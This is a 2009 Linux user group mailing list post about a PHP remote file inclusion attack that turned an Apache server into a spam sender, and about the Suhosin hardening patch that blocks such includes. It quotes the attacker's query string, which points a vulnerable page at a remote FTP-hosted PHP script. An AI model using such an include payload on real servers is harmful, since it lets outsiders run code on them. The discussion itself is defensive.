[nSLUG] apache used to generate spam

Hatem Nassrat hnassrat at gmail.com
Mon Jun 8 00:03:45 ADT 2009


On Mon, Apr 20, 2009 at 1:31 PM, Hatem Nassrat<hnassrat at gmail.com> wrote:
> On Mon, Apr 20, 2009 at 11:39:20AM -0300, D G Teed wrote:
[...]
>> The spammer calls this page with their own value set as:
>>
>> ?this=ftp://wheelingboys.com.br:515151@wheelingboys.com.br/fotos/wallpaper/jamaican.php
>
> You got to love PHP eh?

Opening old wounds ;-)

I have installed apache and PHP (unfortunately many things are done
with php these days) and I found something strange, my server
signature looked weird.

    Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.1 with Suhosin-Patch
Server at localhost Port 80

I decided to see whats this "Suhosin-Patch" that I have installed and
I was shocked. Somebody actually cared to try to fix some of the
security holes in php. If this patch was installed the above attack
would have never happened. Here is an excrept from the "Why?" to
install the patch, page:

"Another common error in these books is that they spread the urban
legend that the most dangerous problem within PHP “remote code
inclusion vulnerabilities” can be fixed by disabling allow_url_fopen
in the configuration (or allow_url_include in PHP 5.2.x). This
information is simply wrong, because these configuration directives do
NOT protect against attacks through php://input or data:// URLs. Our
Suhosin and the former Hardening-Patch are the only available
protections that close all URL include attacks."

Reading its other features, this seems to be an awesome patch to have
installed if you require running PHP code, even if its your own. IMHO
in a webhosting setting, where script kiddies lurk your servers this
is a must install.

-- 
Hatem Nassrat

PS. some (word starts with S and ends with d) guy implemented remote
code inclusion for ruby, the following is his page and the reddit
comments page:

    http://blog.astrails.com/2009/5/12/ruby-http-require
    http://www.reddit.com/r/programming/comments/8jvb1/yes_we_can_require_over_http_that_is/c09ikkx
(actually this is a link to my comment on that page :) )



More information about the nSLUG mailing list